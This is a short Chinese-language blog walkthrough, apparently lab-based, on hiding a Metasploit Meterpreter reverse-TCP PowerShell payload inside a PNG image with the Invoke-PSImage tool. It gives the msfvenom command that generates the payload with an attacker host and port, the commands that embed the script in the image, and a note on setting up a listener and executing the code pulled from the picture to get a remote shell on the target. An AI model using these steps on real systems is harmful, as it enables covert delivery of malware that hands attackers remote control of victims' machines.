某公众号之图片反弹shell
具体公众号猜吧,哈哈哈哈
原项目地址
https://github.com/peewpw/Invoke-PSImage
攻击机 kali 192.168.5.102
靶机 win10 192.168.0.31
1)生成一个msf ps1脚本
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.5.102 LPORT=443 -f psh-reflection -o test.ps1
ps(此时发生地震,四川人民丝毫不慌)
2)利用工具将test.ps1与test.png合成为shell.png。
Import-Module .\Invoke-PSImage.ps1
Invoke-PSImage -Script .\test.ps1 -Image .\test.png -Out .\shell.png
file
3)利用msf配置监听,双击图片
双击图片,依旧未弹回shell。GG思密达(若有成功的,请告诉我)
4)看原项目介绍,利用ps加载远程图片,执行其中的payload。
这边本地加载就好了.执行图中代码,over
更多细节请参考
https://www.4hou.com/technology/9472.html
本人原创首发于圈子,无无水印图,既直接copy。